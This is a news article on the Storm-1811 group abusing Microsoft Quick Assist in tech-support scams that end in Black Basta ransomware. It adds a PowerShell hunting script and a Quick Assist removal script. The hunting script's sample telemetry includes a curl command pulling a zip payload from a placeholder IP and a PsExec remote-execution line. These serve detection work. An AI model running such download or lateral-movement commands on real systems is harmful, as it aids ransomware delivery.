Microsoft’s threat intelligence team said it has observed a threat actor it tracks as Storm-1811 abusing the client management tool Quick Assist to target users in social engineering attacks.
“Storm-1811 is a financially motivated cybercriminal organization known for deploying the Black Basta ransomware,” the company said in a report published on May 15, 2024.
The attack chain uses voice phishing to trick unsuspecting victims into installing remote monitoring and management (RMM) tools, after which QakBot, Cobalt Strike, and ultimately the Black Basta ransomware are deployed.
The tech giant said: “Threat actors are abusing the Quick Assist feature to perform social engineering attacks, such as impersonating a trusted contact such as Microsoft technical support or an IT professional at the target user’s company to gain initial access to the target device.”
Quick Assist is a legitimate Microsoft application that lets a user share their Windows or macOS device with another person over a remote connection, typically so that the other person can troubleshoot problems on the system. It comes pre-installed on devices running Windows 11.
To make the attack more convincing, the threat actors first carry out link listing attacks, a form of email bombing in which the target’s email address is signed up for numerous legitimate email subscription services so that the inbox is flooded with subscription content.
The attackers then call the target users, posing as the company’s IT support team, offer to help fix the spam problem, and convince them to grant access to their devices through Quick Assist.
“Once the user allows access and control, the threat actor runs a scripted cURL command to download a series of batch files or ZIP files used to deliver the malicious payload,” the Windows maker said.
“Storm-1811 leverages its access and performs further hands-on-keyboard activity, such as domain enumeration and lateral movement. Storm-1811 then uses PsExec to deploy Black Basta ransomware across the network.”
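The three stages just described (a Quick Assist session, curl.exe pulling down a batch file or archive, then PsExec for deployment) map onto process-creation telemetry that most Windows environments already collect. The hunting helper below is an added example written for this article, not code from Microsoft’s report or from the actor’s tooling. Field names (TimeCreated, Computer, User, Image, CommandLine) mirror Sysmon event 1 / Security event 4688, the 60-minute correlation window is an assumption, and the records at the bottom are constructed sample data, not real telemetry.

```powershell
# Added example (not from the article or Microsoft's report): walk process-creation
# records and flag the stages of the reported chain: curl.exe fetching a .bat/.cmd/.zip
# shortly after quickassist.exe started on the same host, and any PsExec execution.
function Find-QuickAssistDeliveryChain {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowMinutes = 60   # assumption: how long after Quick Assist starts a download is "related"
    )
    $sorted   = $Events | Sort-Object TimeCreated
    $findings = @()

    foreach ($ev in $sorted) {
        $image = [System.IO.Path]::GetFileName([string]$ev.Image).ToLowerInvariant()
        $cmd   = [string]$ev.CommandLine

        # Stage 2: curl.exe writing a script or archive payload, as the report describes
        if ($image -eq 'curl.exe' -and $cmd -match '\.(bat|cmd|zip)(\s|"|$)') {
            # Was Quick Assist started on the same host within the window before the download?
            $priorQuickAssist = $sorted | Where-Object {
                $_.Computer -eq $ev.Computer -and
                [System.IO.Path]::GetFileName([string]$_.Image) -ieq 'quickassist.exe' -and
                $_.TimeCreated -le $ev.TimeCreated -and
                $_.TimeCreated -ge $ev.TimeCreated.AddMinutes(-$WindowMinutes)
            }
            if ($priorQuickAssist) {
                $stage = 'curl payload download after Quick Assist session'; $sev = 'High'
            } else {
                $stage = 'curl payload download'; $sev = 'Medium'
            }
            $findings += [pscustomobject]@{
                Computer = $ev.Computer; Time = $ev.TimeCreated; User = $ev.User
                Stage = $stage; Severity = $sev; Evidence = $cmd
            }
        }

        # Stage 3: PsExec used to push the ransomware across the network
        if ($image -in @('psexec.exe', 'psexec64.exe')) {
            $findings += [pscustomobject]@{
                Computer = $ev.Computer; Time = $ev.TimeCreated; User = $ev.User
                Stage = 'PsExec remote execution'; Severity = 'High'; Evidence = $cmd
            }
        }
    }
    return $findings
}

# Constructed sample records (not real telemetry); 192.0.2.0/24 is a documentation range.
$sample = @(
    [pscustomobject]@{ TimeCreated = Get-Date '2024-04-22T10:00:00'; Computer = 'WS-042'; User = 'CORP\jdoe'
                       Image = 'C:\Windows\System32\quickassist.exe'; CommandLine = 'quickassist.exe' }
    [pscustomobject]@{ TimeCreated = Get-Date '2024-04-22T10:07:00'; Computer = 'WS-042'; User = 'CORP\jdoe'
                       Image = 'C:\Windows\System32\curl.exe'
                       CommandLine = 'curl.exe -s -o C:\Users\jdoe\AppData\Local\Temp\update.zip http://192.0.2.10/update.zip' }
    [pscustomobject]@{ TimeCreated = Get-Date '2024-04-22T10:41:00'; Computer = 'WS-042'; User = 'CORP\jdoe'
                       Image = 'C:\Users\jdoe\AppData\Local\Temp\PsExec.exe'
                       CommandLine = 'PsExec.exe \\FS-01 -accepteula -s cmd /c C:\Temp\run.bat' }
    [pscustomobject]@{ TimeCreated = Get-Date '2024-04-22T11:15:00'; Computer = 'WS-017'; User = 'CORP\asmith'
                       Image = 'C:\Windows\System32\curl.exe'
                       CommandLine = 'curl.exe https://example.com/status.json' }   # benign: no script or archive
)

Find-QuickAssistDeliveryChain -Events $sample | Format-Table Time, Computer, Severity, Stage -AutoSize
```

On the sample data this yields two High findings for WS-042 (the curl download 7 minutes after Quick Assist started, and the PsExec launch) and nothing for WS-017. To run it against real data, build the `$Events` array from `Get-WinEvent` on the Sysmon operational log or Security 4688 events and map the fields accordingly; curl.exe ships with Windows, so the download rule alone is noisy and is deliberately scored Medium unless Quick Assist precedes it.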
Microsoft said it is closely monitoring the misuse of Quick Assist in these attacks and is working to include warning messages in the software to notify users of possible technical support scams that facilitate the delivery of ransomware.
Rapid7 said the campaign is believed to have started in mid-April 2024 and targeted multiple industries and verticals, including manufacturing, construction, food and beverage, and transportation, indicating the opportunistic nature of the attacks.
Robert Knapp, senior manager of incident response at Rapid7, said: “The low barrier to entry for carrying out these attacks, combined with the significant impact these attacks have on their victims, continues to make them an effective option for threat actors seeking a payday.”
Microsoft also describes Black Basta as a “closed ransomware offering” rather than a ransomware-as-a-service (RaaS) operation, the latter being a network of core developers, affiliates and initial access brokers who together conduct ransomware and extortion attacks.
The company said it is “distributed by a small number of threat actors who often rely on other threat actors for initial access, malicious infrastructure and malware development.”
“Since Black Basta first emerged in April 2022, Black Basta attackers have deployed the ransomware after receiving access from QakBot and other malware distributors, highlighting the need for organizations to focus on the stages of an attack that precede ransomware deployment in order to reduce the threat.”
Organizations are advised to block or uninstall Quick Assist and similar remote monitoring and management tools where they are not in use, and to train employees to recognize tech support scams.
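For the “uninstall if unused” part of that advice, the script below is an added example for this article, not code from Microsoft or the article’s author. It inventories and, when asked, removes both forms in which Quick Assist ships: the in-box Windows capability and the Microsoft Store package. The capability and package names are the ones Microsoft documents for those two forms; confirm them on your own Windows build before deploying at scale. It must run in an elevated PowerShell session.

```powershell
# Added example, not from the article or from Microsoft: report and remove Quick Assist.
#Requires -RunAsAdministrator

$CapabilityName = 'App.Support.QuickAssist~~~~0.0.1.0'   # in-box form (Windows 10 / early Windows 11)
$StorePackage   = 'MicrosoftCorporationII.QuickAssist'    # Microsoft Store form (current Windows 11)

function Get-QuickAssistState {
    # Each query is tolerant of the component simply not being there.
    $cap  = Get-WindowsCapability -Online -Name $CapabilityName -ErrorAction SilentlyContinue
    $pkg  = Get-AppxPackage -AllUsers -Name $StorePackage -ErrorAction SilentlyContinue
    $prov = Get-AppxProvisionedPackage -Online | Where-Object DisplayName -eq $StorePackage
    [pscustomobject]@{
        CapabilityInstalled     = [bool]($cap -and $cap.State -eq 'Installed')
        StorePackageInstalled   = [bool]$pkg
        StorePackageProvisioned = [bool]$prov   # if true, new user profiles would get it back
    }
}

function Remove-QuickAssist {
    # SupportsShouldProcess gives the function -WhatIf/-Confirm for a dry run first.
    [CmdletBinding(SupportsShouldProcess)]
    param()

    $state = Get-QuickAssistState

    if ($state.CapabilityInstalled -and
        $PSCmdlet.ShouldProcess($env:COMPUTERNAME, "Remove Windows capability $CapabilityName")) {
        Remove-WindowsCapability -Online -Name $CapabilityName | Out-Null
    }

    if ($state.StorePackageInstalled -and
        $PSCmdlet.ShouldProcess($env:COMPUTERNAME, "Remove Store package $StorePackage for all users")) {
        Get-AppxPackage -AllUsers -Name $StorePackage | Remove-AppxPackage -AllUsers
    }

    if ($state.StorePackageProvisioned -and
        $PSCmdlet.ShouldProcess($env:COMPUTERNAME, "Deprovision $StorePackage so new profiles do not receive it")) {
        Get-AppxProvisionedPackage -Online |
            Where-Object DisplayName -eq $StorePackage |
            Remove-AppxProvisionedPackage -Online | Out-Null
    }

    # Return the post-change state so the caller can verify the result.
    Get-QuickAssistState
}

# Usage: inventory first, rehearse with -WhatIf, then remove for real.
Get-QuickAssistState
Remove-QuickAssist -WhatIf
# Remove-QuickAssist
```

Deprovisioning matters because removing the Store package for existing users does not stop it from being laid down in the next new profile. Where the tool cannot be removed (for example, the help desk legitimately uses it on some machines), the article’s other option, blocking, is the fallback: restrict execution of the Quick Assist binary with application control on the endpoints that should never run it, and keep a hunting rule like the one above for the ones that do.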